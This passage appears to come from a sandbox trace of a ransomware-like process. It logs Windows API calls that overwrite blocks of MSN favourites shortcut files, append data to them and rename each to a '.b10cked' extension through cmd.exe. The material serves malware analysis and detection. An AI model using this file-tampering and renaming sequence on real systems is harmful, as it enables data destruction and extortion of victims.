lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.613] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.613] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.613] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.613] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0214.614] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x85 [0214.614] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0214.614] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0214.614] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0214.614] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x85 [0214.614] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0214.614] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0214.614] ReadFile (in: hFile=0x120, lpBuffer=0x135adb8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesRead=0x12ec08*=0x41, lpOverlapped=0x0) returned 1 [0214.615] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0214.615] WriteFile (in: hFile=0x120, lpBuffer=0x135adb8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesWritten=0x12ec1c*=0x41, lpOverlapped=0x0) returned 1 [0214.615] SetFilePointer (in: hFile=0x120, lDistanceToMove=-65, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x44 [0214.615] ReadFile (in: hFile=0x120, lpBuffer=0x135adb8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesRead=0x12ec08*=0x41, lpOverlapped=0x0) returned 1 [0214.615] SetFilePointer (in: hFile=0x120, lDistanceToMove=-65, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x44 [0214.616] WriteFile (in: hFile=0x120, lpBuffer=0x135adb8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesWritten=0x12ec1c*=0x41, lpOverlapped=0x0) returned 1 [0214.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSN Money.url", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0214.681] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSN Money.url", cchWideChar=13, lpMultiByteStr=0x13131ec, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSN Money.url", lpUsedDefaultChar=0x0) returned 13 [0214.681] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x85 [0214.681] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0214.681] CloseHandle (hObject=0x120) returned 1 [0214.682] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNMON~1.URL") returned 0x2f [0214.682] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\") returned 0x23 [0214.683] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNMON~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Money.url.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNMON~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Money.url.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x638, dwThreadId=0xb98)) returned 1 [0214.687] CloseHandle (hObject=0x1b4) returned 1 [0214.687] CloseHandle (hObject=0x120) returned 1 [0214.687] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\MSN Websites\\", cchLength=0x28 | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\MSN WEBSITES\\") returned 0x28 [0214.687] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\MSN Websites\\", cchLength=0x28 | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\MSN WEBSITES\\") returned 0x28 [0214.688] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\DEFAULT\\FAVORITES\\MSN WEBSITES\\", cchCount1=40, lpString2="C:\\USERS\\DEFAULT\\FAVORITES\\MSN WEBSITES\\", cchCount2=40) returned 2 [0214.688] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0214.688] ReleaseMutex (hMutex=0xf8) returned 1 [0214.688] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0214.688] ReleaseMutex (hMutex=0xf8) returned 1 [0214.688] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0214.688] ReleaseMutex (hMutex=0xf8) returned 1 [0214.688] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0214.688] ReleaseMutex (hMutex=0xf8) returned 1 [0214.688] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn sports.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0214.688] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.688] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.688] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.688] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27147739817) returned 1 [0214.688] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.688] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.688] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.688] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.688] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.688] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.688] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0214.689] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x85 [0214.689] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0214.689] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.689] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.689] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.689] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.689] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.689] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.689] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.689] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.689] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.689] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.689] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.689] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.689] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.689] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.689] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.689] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.689] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.689] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.689] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0214.689] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x85 [0214.690] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0214.690] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0214.690] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0214.690] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x85 [0214.690] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0214.690] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0214.690] ReadFile (in: hFile=0x120, lpBuffer=0x135adb8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesRead=0x12ec08*=0x41, lpOverlapped=0x0) returned 1 [0214.691] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0214.691] WriteFile (in: hFile=0x120, lpBuffer=0x135adb8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesWritten=0x12ec1c*=0x41, lpOverlapped=0x0) returned 1 [0214.691] SetFilePointer (in: hFile=0x120, lDistanceToMove=-65, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x44 [0214.691] ReadFile (in: hFile=0x120, lpBuffer=0x135adb8, nNumberOfBytesToRead=0x41, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesRead=0x12ec08*=0x41, lpOverlapped=0x0) returned 1 [0214.691] SetFilePointer (in: hFile=0x120, lDistanceToMove=-65, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x44 [0214.691] WriteFile (in: hFile=0x120, lpBuffer=0x135adb8*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x135adb8*, lpNumberOfBytesWritten=0x12ec1c*=0x41, lpOverlapped=0x0) returned 1 [0214.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSN Sports.url", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0214.695] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MSN Sports.url", cchWideChar=14, lpMultiByteStr=0x131324c, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MSN Sports.url", lpUsedDefaultChar=0x0) returned 14 [0214.695] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x85 [0214.695] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0214.695] CloseHandle (hObject=0x120) returned 1 [0214.696] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNSPO~1.URL") returned 0x2f [0214.697] GetShortPathNameW (in: lpszLongPath="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\") returned 0x23 [0214.697] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNSPO~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Sports.url.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSNSPO~1.URL\" \"C:\\Users\\Default\\FAVORI~1\\MSNWEB~1\\MSN Sports.url.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xb64, dwThreadId=0xc94)) returned 1 [0214.699] CloseHandle (hObject=0x1b4) returned 1 [0214.699] CloseHandle (hObject=0x120) returned 1 [0214.699] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\MSN Websites\\", cchLength=0x28 | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\MSN WEBSITES\\") returned 0x28 [0214.699] CharUpperBuffW (in: lpsz="C:\\Users\\Default\\Favorites\\MSN Websites\\", cchLength=0x28 | out: lpsz="C:\\USERS\\DEFAULT\\FAVORITES\\MSN WEBSITES\\") returned 0x28 [0214.699] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\DEFAULT\\FAVORITES\\MSN WEBSITES\\", cchCount1=40, lpString2="C:\\USERS\\DEFAULT\\FAVORITES\\MSN WEBSITES\\", cchCount2=40) returned 2 [0214.699] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0214.699] ReleaseMutex (hMutex=0xf8) returned 1 [0214.699] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0214.700] ReleaseMutex (hMutex=0xf8) returned 1 [0214.700] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0214.700] ReleaseMutex (hMutex=0xf8) returned 1 [0214.700] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0214.700] ReleaseMutex (hMutex=0xf8) returned 1 [0214.700] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0214.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.700] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=27148932117) returned 1 [0214.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0214.700] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x85 [0214.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0214.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0214.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x85 [0214.701] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: 